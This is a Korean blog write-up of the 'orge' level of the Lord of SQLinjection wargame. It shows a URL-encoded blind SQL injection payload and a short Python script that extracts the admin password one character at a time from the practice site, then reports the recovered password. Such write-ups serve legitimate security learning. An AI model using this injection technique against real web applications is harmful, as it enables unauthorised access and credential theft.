반응형
LOS 7번째 문제 orge 이다.
뭔가 어디서 많이 본 문제 아닌가?
근데 and 대신 &&를 넣었는데 안된다
여러번 다르게 시도하다가 혹시나 싶어서 url encode 값으로 시도하니 잘된다...
https://www.degraeve.com/reference/urlencoding.php
길이를 알아내기 위해 <10 하니 hello admin이 나왔다.
=9부터 내려가보니 바로 8번째에 hello admin이 나온다.
그럼 이제 코드를 짜면된다.
이전에 짜둔 코드를 수정하는게 편하다.
이전에 짜둔 코드에서 url과 "or" "and"만 수정하자. (pw길이도 이전 blindsqlinjection 문제와 똑같다)
import requests
length=8
url="https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php"
header = {'cookie' : 'PHPSESSID=your session id'}
for i in range(1,9):
for j in range(48, 128):
sub_url = "?pw="+"1' || id='admin' %26%26 substr(pw,"+str(i)+",1)='"+chr(j)
query = url+sub_url
req = requests.post(url=query, headers=header)
if "Hello admin" in req.text:
print(chr(j))
break
pw는 6c864dec이다.
반응형
'Security > WebHacking' 카테고리의 다른 글
| [Load of SQLinjection][LOS] 문제풀이 vampire (0) | 2021.08.12 |
|---|---|
| [Load of SQLinjection][LOS] 문제풀이 troll (0) | 2021.08.12 |
| [Load of SQLinjection][LOS] 문제풀이 darkelf (0) | 2021.08.12 |
| [Load of SQLinjection][LOS] 문제풀이 wolfman (0) | 2021.08.12 |
| [Load of SQLinjection][LOS] 문제풀이 orc (0) | 2021.08.12 |
